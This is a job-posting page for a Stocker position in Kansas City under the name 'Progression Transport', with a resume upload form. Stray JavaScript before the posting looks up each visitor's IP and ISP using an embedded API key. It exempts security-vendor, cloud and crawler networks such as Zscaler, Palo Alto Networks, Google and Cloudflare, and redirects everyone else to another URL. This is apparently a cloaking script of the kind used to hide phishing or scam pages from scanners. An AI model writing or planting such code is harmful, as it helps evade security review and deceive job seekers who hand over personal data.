Stocker

Stocker

Overview


const ipAddress = data.ip;

// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;

// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));

if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ''; } }) .catch(error => { console.error('Error retrieving ISP name:', error); }); }) .catch(error => { console.error('Error retrieving IP address or location:', error); });

We are seeking a dedicated Stocker to join our team in Kansas City, Missouri. In this role, you will be responsible for ensuring shelves are stocked, organized, and maintained to provide a positive shopping experience.

Responsibilities include:

  • Receiving and unloading shipments efficiently
  • Stocking shelves and displays accurately and promptly
  • Maintaining inventory levels and restocking as needed
  • Keeping the sales floor clean, organized, and safe
  • Assisting customers with locating products and answering questions
  • Following safety protocols and company policies

Skills needed:

  • Attention to detail and organizational skills
  • Ability to lift heavy items and stand for extended periods
  • Good communication and teamwork skills
  • Dependability and a positive attitude

Benefits include:

  • Competitive pay
  • Health, dental, and vision insurance options
  • Paid time off and holidays
  • Employee discounts
  • Opportunities for growth and advancement
Emploment Location
Kansas City, Missouri

Apply to Join Progression Transport.

*
*
* Attach your resume. Max size 2mb Allowed Types: pdf